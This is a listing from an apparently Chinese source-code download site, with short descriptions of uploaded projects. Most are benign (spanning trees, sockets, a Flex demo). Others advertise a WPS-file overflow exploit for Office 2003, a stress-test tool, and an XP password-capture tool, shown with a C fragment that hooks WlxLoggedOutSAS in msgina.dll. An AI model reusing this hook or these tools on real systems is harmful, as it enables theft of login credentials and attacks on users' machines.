-
Kruskal最小生成树Kruskal最小生成树和最小跨度…
kruskal minimum spanning tree kruska l minimum spanning tree kruska l minimum spanning tree kruskal minimum spanning tr-kruskal minimum spanning tree kruskal minimum spanning tree kruskal minimum spanning tree kruskal minimum spanning tree kruskal minimum spanning tree kruskal minimum spanning tree
- 2022-03-25 07:52:00下载
- 积分:1
-
Examples of socket communication, the most easy
socket 通信实例,最让人易懂的教程。-Examples of socket communication, the most easy-to-understand tutorial.
- 2022-01-24 16:35:16下载
- 积分:1
-
关于这个漏洞的测试俺需要说明一下,漏洞是因为office在打开wps格式的文件进行转换时出现了漏洞,所以需要安装转换器。不过我在安装office 2003的时候...
关于这个漏洞的测试俺需要说明一下,漏洞是因为office在打开wps格式的文件进行转换时出现了漏洞,所以需要安装转换器。不过我在安装office 2003的时候默认是安装了转换器的
。测试的时候先打开offie然后选择生成好的.wps文件即可(或者右键单击生成好的文件然后选择用winword打开)。
我添加了对简体中文和繁体中文系统的支持,在windows xp sp2+microsot office 2003 sp2上测试成功!-wps2 overflow c code ....hope to be useful to you (Test Environment is windows xp sp2+microsot office 2003 sp2)
- 2022-04-20 17:59:39下载
- 积分:1
-
程序使用VC来扫描端口!!程序简单适用于VC的初学者
程序使用VC来扫描端口!!程序简单适用于VC的初学者-VC uses to scan the port!! Procedures are simple and applies to VC beginner!!
- 2022-05-07 11:40:17下载
- 积分:1
-
简单应用,了解flex的界面概括...希望能够对新手有一些帮助
简单应用,了解flex的界面概括...希望能够对新手有一些帮助-ddfsf
- 2022-10-04 10:05:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
赢
win-sys完整版nt_filesystem_internal_book,for english condition ,on2005.10.26,thank you-win-sys nt_filesystem_internal_book full version, for english condition, on2005.10.26, thank you
- 2022-10-19 14:25:04下载
- 积分:1
-
used to prepare an "electronic display screen characters" procedures,...
一个用ASM51编写的《 电子屏字符显示器》程序,现在贡献给大家分享。-used to prepare an "electronic display screen characters" procedures, contribution to share with you all.
- 2022-08-20 05:24:28下载
- 积分:1
-
DLL has been kidnapped to prevent some of the basic functions, to achieve the ba...
预防DLL被挟持的一些基本功能,实现了基本饿保护,代码简单,可自行修改-DLL has been kidnapped to prevent some of the basic functions, to achieve the basic hungry protection, the code simple, free to modify the
- 2022-03-13 15:18:21下载
- 积分:1
-
风云压力测试10。0所有封装好的VC原代码
有一定的学习研究作用 大家可以下载来...
风云压力测试10。0所有封装好的VC原代码
有一定的学习研究作用 大家可以下载来-Stress tests Fengyun 10.0 best VC all package source code has a certain role of U.S. research study can be downloaded to
- 2022-05-29 14:23:17下载
- 积分:1